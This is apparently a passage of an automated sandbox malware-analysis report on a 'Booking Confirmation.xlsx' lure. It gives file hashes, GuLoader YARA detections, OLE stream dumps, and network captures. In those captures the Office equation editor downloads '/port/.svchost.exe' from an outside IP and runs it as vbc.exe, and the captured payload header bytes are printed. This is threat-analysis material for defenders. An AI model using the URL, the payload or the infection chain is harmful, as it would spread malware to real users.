                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                  C:\Users\user\Desktop\~$Booking Confirmation.xlsx
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):330
                  Entropy (8bit):1.4377382811115937
                  Encrypted:false
                  SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                  MD5:96114D75E30EBD26B572C1FC83D1D02E
                  SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                  SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                  SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                  Malicious:false
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  C:\Users\Public\vbc.exe
                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):267376
                  Entropy (8bit):4.7769054763067915
                  Encrypted:false
                  SSDEEP:1536:x2M5j2eBXFScbssSe/W+dMa27qQ0Z9Dfs4IwNAvgiIOm72tNHLg/8A:T5FXrbVTeE2uQU7s49AMUrg/8A
                  MD5:FCFB0EC70F1419EDE8A534CC95CB61E9
                  SHA1:D3B529D77F1DE00D63A75B3956D4BCF6BBCE30CA
                  SHA-256:FF1B034C7060724133C6DF0AA8CF5411EC0E6775D3ACA83A127617340A8C588A
                  SHA-512:FFEC36B157F889A2BD351B9D8423B247138A5FD2E57DE83BB1253336518431136A265D244B653AF470A8D04E2674C4CADF467C065A7FC38F10EFFEDD705AB248
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 7%
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....FR.................`..........p........p....@..........................................................................d..(........z..........X............... .......................................(... ....................................text...0Y.......`.................. ..`.data........p.......p..............@....rsrc....z..........................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:CDFV2 Encrypted
                  Entropy (8bit):7.994338822907313
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name:Booking Confirmation.xlsx
                  File size:1221992
                  MD5:870a4c72bccd58de144c7b845d56c626
                  SHA1:482681f75180bbb1286e1f93ce44dfae0b6b0007
                  SHA256:37fffcbacca59290a7a3b6271ebf475a50b9e17eba113459cfc00508a7268b68
                  SHA512:0281d94a5119fbd46012ae0c9d9aedad400264803feb6f1224f031750673d7f30de78f594713b7a00c081794d39173f4992fd27dd9e8ef0fae4f82ffe523cfbf
                  SSDEEP:24576:kux4KztYcWgmU+Y/6bHtPVa6dneKiAqI3RW6Myfhc:pmK6ImUP8tPVa1Kcjyfhc
                  File Content Preview:........................>...............................................................................................z.......z.......|......................................................................................................................

                  File Icon

                  Icon Hash:e4e2aa8aa4b4bcb4

                  Static OLE Info

                  General

                  Document Type:OLE
                  Number of OLE Files:1

                  OLE File "Booking Confirmation.xlsx"

                  Indicators

                  Has Summary Info:False
                  Application Name:unknown
                  Encrypted Document:True
                  Contains Word Document Stream:False
                  Contains Workbook/Book Stream:False
                  Contains PowerPoint Document Stream:False
                  Contains Visio Document Stream:False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros:False

                  Streams

                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                  General
                  Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                  File Type:data
                  Stream Size:64
                  Entropy:2.73637206947
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                  Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                  Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                  General
                  Stream Path:\x6DataSpaces/DataSpaceMap
                  File Type:data
                  Stream Size:112
                  Entropy:2.7597816111
                  Base64 Encoded:False
                  Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                  Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
                  General
                  Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                  File Type:data
                  Stream Size:208
                  Entropy:3.35153409046
                  Base64 Encoded:False
                  Data ASCII:l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
                  Data Raw:6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                  Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                  General
                  Stream Path:\x6DataSpaces/Version
                  File Type:data
                  Stream Size:76
                  Entropy:2.79079600998
                  Base64 Encoded:False
                  Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                  Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                  Stream Path: EncryptedPackage, File Type: data, Stream Size: 1208680
                  General
                  Stream Path:EncryptedPackage
                  File Type:data
                  Stream Size:1208680
                  Entropy:7.99865188998
                  Base64 Encoded:True
                  Data ASCII:V q . . . . . . . . . . . . . . J E . . . . . y 1 R . ? . . . . . . . . ] . . . H . . . . . { p q . I . . 8 * . . . } . . . . . " = . b . f . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . . . . . # . . . . . . . 4 . . . .
                  Data Raw:56 71 12 00 00 00 00 00 82 1e eb 04 b0 13 98 8c 4a 45 bb 83 e7 b6 b0 79 31 52 a0 3f 01 ac 9e d3 bd 82 8b b7 5d 0a de b6 48 c8 00 ac 0c b4 7b 70 71 da 49 03 c5 38 2a af 06 1b 7d da 9c ae b6 83 22 3d e8 62 a2 66 0f e8 ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6 07 f5 eb 23 2e 80 07 db ae 08 18 34 db 0b 06 a6
                  Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                  General
                  Stream Path:EncryptionInfo
                  File Type:data
                  Stream Size:224
                  Entropy:4.67069001022
                  Base64 Encoded:False
                  Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . ` . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . . . . . . . . . w . . . . . . . . h | . . . . . . . . . . . . 6 G . M . $ = a _ ? . . S . P . . . . . . . " . . . @ . . | . .
                  Data Raw:03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 60 11 e9 09 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 14, 2021 16:55:35.897506952 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.153352022 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.153625965 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.154084921 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.409609079 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.409646034 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.409670115 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.409693003 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.409729004 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.409774065 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.664187908 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.664213896 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.664227009 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.664238930 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.664453983 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.664853096 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.664872885 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.664917946 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.664928913 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.664962053 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.664969921 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.665000916 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.919806004 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.919847965 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.920083046 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.921953917 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.921977043 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.921994925 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922015905 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922039032 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922054052 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.922075033 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922096014 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922123909 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922130108 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.922152042 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922161102 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.922180891 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922192097 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.922224045 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.922280073 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922302008 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922329903 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.922357082 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.922379971 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922404051 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:36.922447920 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.922467947 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:36.924274921 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.174513102 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.174547911 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.174573898 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.174653053 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.174719095 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.174815893 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.177390099 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.177429914 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.177514076 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.177553892 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.177598953 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.177658081 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.177680016 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.177701950 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.177716970 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.177757978 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.177798986 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.177934885 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.177982092 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178034067 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178080082 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178111076 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178124905 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178138971 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178162098 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178199053 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178231001 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178287983 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178324938 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178426027 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178448915 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178464890 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178488016 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178685904 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178731918 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178793907 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178831100 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178843975 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178885937 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.178950071 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178973913 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.178986073 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.179012060 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.179034948 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.179059029 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.179069996 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.179112911 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.179131985 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.179157972 CEST8049165180.214.239.39192.168.2.22
                  Jul 14, 2021 16:55:37.179168940 CEST4916580192.168.2.22180.214.239.39
                  Jul 14, 2021 16:55:37.179205894 CEST4916580192.168.2.22180.214.239.39

                  HTTP Request Dependency Graph

                  • 180.214.239.39

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.2249165180.214.239.3980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  TimestampkBytes transferredDirectionData
                  Jul 14, 2021 16:55:36.154084921 CEST0OUTGET /port/.svchost.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 180.214.239.39
                  Connection: Keep-Alive
                  Jul 14, 2021 16:55:36.409609079 CEST1INHTTP/1.1 200 OK
                  Date: Wed, 14 Jul 2021 14:55:35 GMT
                  Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                  Last-Modified: Tue, 13 Jul 2021 17:05:39 GMT
                  ETag: "41470-5c7043f493d18"
                  Accept-Ranges: bytes
                  Content-Length: 267376
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: application/x-msdownload
                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e2 ca 46 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 60 03 00 00 90 00 00 00 00 00 00 70 14 00 00 00 10 00 00 00 70 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 10 00 00 e6 1c 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 64 03 00 28 00 00 00 00 80 03 00 92 7a 00 00 00 00 00 00 00 00 00 00 58 00 04 00 18 14 00 00 00 00 00 00 00 00 00 00 20 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 03 00 00 10 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 0b 00 00 00 70 03 00 00 10 00 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 92 7a 00 00 00 80 03 00 00 80 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPELFR`pp@d(zX ( .text0Y` `.datapp@.rsrcz@@IMSVBVM60.DLL


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:16:54:44
                  Start date:14/07/2021
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Imagebase:0x13f820000
                  File size:27641504 bytes
                  MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:55:06
                  Start date:14/07/2021
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                  Imagebase:0x400000
                  File size:543304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:16:55:09
                  Start date:14/07/2021
                  Path:C:\Users\Public\vbc.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\Public\vbc.exe'
                  Imagebase:0x400000
                  File size:267376 bytes
                  MD5 hash:FCFB0EC70F1419EDE8A534CC95CB61E9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000002.2365772167.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2365714834.00000000002A0000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: 00000006.00000000.2148896829.0000000000401000.00000020.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                  Antivirus matches:
                  • Detection: 7%, ReversingLabs
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >